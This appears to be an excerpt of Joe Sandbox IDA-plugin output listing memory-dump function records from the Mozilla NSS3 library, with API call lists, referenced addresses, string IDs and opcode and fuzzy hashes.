                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 491875419-598938438
                                                                                                                                                                                                                          • Opcode ID: 0ebf5a01bc3ba08d3fb6f4b6b605b27399cc1d90b47122732718c49a526db24a
                                                                                                                                                                                                                          • Instruction ID: 7582f84199e9775e2d9788e13f958186fad4a7cc50a925fb321e5cc4ce629708
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ebf5a01bc3ba08d3fb6f4b6b605b27399cc1d90b47122732718c49a526db24a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1613771A042108BD310CF29CC41BAABBF5EF95318F1885ADE4489BB42D376E947CBE1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C500113
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C500130
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000040), ref: 6C50015D
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C5001AF
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD056,00000000), ref: 6C500202
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C500224
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C500253
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
                                                                                                                                                                                                                          • String ID: exporter
                                                                                                                                                                                                                          • API String ID: 712147604-111224270
                                                                                                                                                                                                                          • Opcode ID: ac330be87068f54b756c5642ba26b0709179db7e2a92b2361b0dc4216e41cedf
                                                                                                                                                                                                                          • Instruction ID: 2b1b9842bc1bc29f616eb6b20addfcdedeec07d5ec8cfaf4a58f863616482d5e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac330be87068f54b756c5642ba26b0709179db7e2a92b2361b0dc4216e41cedf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD61F571E007899BEF118FA4CC04BEE77B6BFC4308F144529ED1A96A62EB31A954C791
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C4D536F,00000022,?,?,00000000,?), ref: 6C4D4E70
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C4D4F28
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C4D4F8E
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C4D4FAE
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D4FC8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: R_smprintf$Alloc_Utilfreeisspace
• String ID: %s=%c%s%c$%s=%s$oSMl"
• API String ID: 2709355791-1484050375
• Opcode ID: c0ad453cd94a9f9862dbaa5edeb0258d751fa45ab1d29b95975039002bf5313f
• Instruction ID: 3f7a00d608988b5663deb7cce9859a559b37e72c5f25601889a3d6d9d7e3ae3c
• Opcode Fuzzy Hash: c0ad453cd94a9f9862dbaa5edeb0258d751fa45ab1d29b95975039002bf5313f
• Instruction Fuzzy Hash: 85515C31A041469BEF01DB69C8B0FFF7BF19F4638AF1A5129E894A7B40D335B8058791
APIs
• PR_SetError.NSS3(FFFFE013,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEF6D
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• htonl.WSOCK32(00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEFE4
• htonl.WSOCK32(?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEFF1
• memcpy.VCRUNTIME140(?,?,6C51A4A1,?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FF00B
• memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FF027
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: htonlmemcpy$ErrorValue
• String ID: dtls13
• API String ID: 242828995-1883198198
• Opcode ID: 6d1b5232ed972261d6e72c8c9c048d8b2713fc0b29627d2e115d3eb54547cd89
• Instruction ID: b8ec734ec729fbce2a28e3717a83cf3c54a99397a333fa1d3a353a05e998cb50
• Opcode Fuzzy Hash: 6d1b5232ed972261d6e72c8c9c048d8b2713fc0b29627d2e115d3eb54547cd89
• Instruction Fuzzy Hash: 1131D271A01211AFDB10DF28DC80F8AB7E4AF89349F158029E8289B751E731ED16CBE1
APIs
• PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C47AFBE
• SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C599500,6C473F91), ref: 6C47AFD2
  • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
• DER_GetInteger_Util.NSS3(?), ref: 6C47B007
  • Part of subcall function 6C4C6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C471666,?,6C47B00C,?), ref: 6C4C6AFB
• PR_SetError.NSS3(FFFFE009,00000000), ref: 6C47B02F
• PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C47B046
• PL_FreeArenaPool.NSS3 ref: 6C47B058
• PL_FinishArenaPool.NSS3 ref: 6C47B060
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
• String ID: security
• API String ID: 3627567351-3315324353
• Opcode ID: 187e043d834ae8a207a1ccc8ae21e98c9e4f9299d7a0b5f1b652720b96946a85
• Instruction ID: 0fbd463341f5ea9942369b7b36b58f9ed84646e97d602dae5a661815a081cf9d
• Opcode Fuzzy Hash: 187e043d834ae8a207a1ccc8ae21e98c9e4f9299d7a0b5f1b652720b96946a85
• Instruction Fuzzy Hash: 2331E5704043409BDB20CF149C49FEA77B4AF8636CF10465DE8B59BBD1E332950987A7
APIs
  • Part of subcall function 6C4740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C473F7F,?,00000055,?,?,6C471666,?,?), ref: 6C4740D9
  • Part of subcall function 6C4740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C471666,?,?), ref: 6C4740FC
  • Part of subcall function 6C4740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C471666,?,?), ref: 6C474138
• PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C473EC2
• SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C473ED6
  • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
• SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C473EEE
  • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
  • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
• PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C473F02
• PL_FreeArenaPool.NSS3 ref: 6C473F14
• PL_FinishArenaPool.NSS3 ref: 6C473F1C
  • Part of subcall function 6C4D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C4D127C,00000000,00000000,00000000), ref: 6C4D650E
• SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C473F27
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
• String ID: security
• API String ID: 1076417423-3315324353
• Opcode ID: a855ac122bc101631abbaa5509484ca7b87e36a363aab6dc4c185e2c51510785
• Instruction ID: fd11ff5774cf83a601aa82a0b8fcfad80edeea7057d03f756ad38dee1563a64f
• Opcode Fuzzy Hash: a855ac122bc101631abbaa5509484ca7b87e36a363aab6dc4c185e2c51510785
• Instruction Fuzzy Hash: 6821F8B1904300ABD714DB15AC11FAB77B8EB4435CF05093DF949A7741F731A91887DA
APIs
• memcpy.VCRUNTIME140(?,00000100,?), ref: 6C4BCD08
• PK11_DoesMechanism.NSS3(?,?), ref: 6C4BCE16
• PR_SetError.NSS3(00000000,00000000), ref: 6C4BD079
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: DoesErrorK11_MechanismValuememcpy
• String ID:
• API String ID: 1351604052-0
• Opcode ID: 8f982f5ba810317abeac41c5032d8b7ec6957f892504efb866a347ddc2f3d1eb
• Instruction ID: 1449564201a83ca7424df0d8c5bcc67a878503defd01dc3019da259cf4db8f6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f982f5ba810317abeac41c5032d8b7ec6957f892504efb866a347ddc2f3d1eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7C15CB5A002199BDB20DF24CC84FDAB7B4AB48318F1541A8E948A7741E775EE95CFE0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C4B97C1,?,00000000,00000000,?,?,?,00000000,?,6C497F4A,00000000), ref: 6C4ADC68
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADD36
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE2D
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE43
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE76
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF32
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF5F
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF78
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADFAA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1886645929-0
                                                                                                                                                                                                                          • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                          • Instruction ID: b5b7dba26cc6bef2a4ae32a9ebba661c24efdb914a3c4a61a195d7ae517043d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2681B570606A008BFF14CED9C890F5B7692DB7434AF24843ADD5ACAFE9E774D486C642
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C483C76
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C483C94
                                                                                                                                                                                                                            • Part of subcall function 6C4795B0: TlsGetValue.KERNEL32(00000000,?,6C4900D2,00000000), ref: 6C4795D2
                                                                                                                                                                                                                            • Part of subcall function 6C4795B0: EnterCriticalSection.KERNEL32(?,?,?,6C4900D2,00000000), ref: 6C4795E7
                                                                                                                                                                                                                            • Part of subcall function 6C4795B0: PR_Unlock.NSS3(?,?,?,?,6C4900D2,00000000), ref: 6C479605
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C483CB2
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C483CCA
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C483CE1
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                            • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3167935723-0
                                                                                                                                                                                                                          • Opcode ID: 9725eb3c823ca89980d53cde6801e518cadd7fe8be122ede97fa867abd031ad9
                                                                                                                                                                                                                          • Instruction ID: 881ce6a4a80df15194f8cb6080a8cce3418c626b5e3f2c343c369ecfaa999f07
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9725eb3c823ca89980d53cde6801e518cadd7fe8be122ede97fa867abd031ad9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2661B2B5A01201ABEF11DE65DC41FAB76B9EF14748F084428EE0AAAB52F731D914C7F1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PK11_GetAllTokens.NSS3 ref: 6C4C3481
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C4C34A3
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: TlsGetValue.KERNEL32 ref: 6C4C352E
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: EnterCriticalSection.KERNEL32(?), ref: 6C4C3542
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PR_Unlock.NSS3(?), ref: 6C4C355B
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C3D8B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C3D9F
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C3DCA
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3DE2
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4C3E4F
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C3E97
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C3EAB
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C3ED6
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3EEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2554137219-0
                                                                                                                                                                                                                          • Opcode ID: 9d9261a68fae56e545f5af8a436bcdca42c2f0ac990d11ee7667485f96226cb8
                                                                                                                                                                                                                          • Instruction ID: 48a1bf3b4a1d10d8a348e3903475fae31ad35f6412a06c5e2ca806bcb38ec5f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d9261a68fae56e545f5af8a436bcdca42c2f0ac990d11ee7667485f96226cb8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78512579B006109FEB01EF69DC44FA673B4AF45319F060528DE095BB22EB31E944CBD2
APIs
• PORT_ZAlloc_Util.NSS3(92AB236F), ref: 6C472C5D
  • Part of subcall function 6C4D0D30: calloc.MOZGLUE ref: 6C4D0D50
  • Part of subcall function 6C4D0D30: TlsGetValue.KERNEL32 ref: 6C4D0D6D
• CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C472C8D
• SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C472CE0
  • Part of subcall function 6C472E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C472CDA,?,00000000), ref: 6C472E1E
  • Part of subcall function 6C472E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C472E33
  • Part of subcall function 6C472E00: TlsGetValue.KERNEL32 ref: 6C472E4E
  • Part of subcall function 6C472E00: EnterCriticalSection.KERNEL32(?), ref: 6C472E5E
  • Part of subcall function 6C472E00: PL_HashTableLookup.NSS3(?), ref: 6C472E71
  • Part of subcall function 6C472E00: PL_HashTableRemove.NSS3(?), ref: 6C472E84
  • Part of subcall function 6C472E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C472E96
  • Part of subcall function 6C472E00: PR_Unlock.NSS3 ref: 6C472EA9
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C472D23
• CERT_IsCACert.NSS3(00000001,00000000), ref: 6C472D30
• CERT_MakeCANickname.NSS3(00000001), ref: 6C472D3F
• free.MOZGLUE(00000000), ref: 6C472D73
• CERT_DestroyCertificate.NSS3(?), ref: 6C472DB8
• free.MOZGLUE ref: 6C472DC8
  • Part of subcall function 6C473E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C473EC2
  • Part of subcall function 6C473E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C473ED6
  • Part of subcall function 6C473E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C473EEE
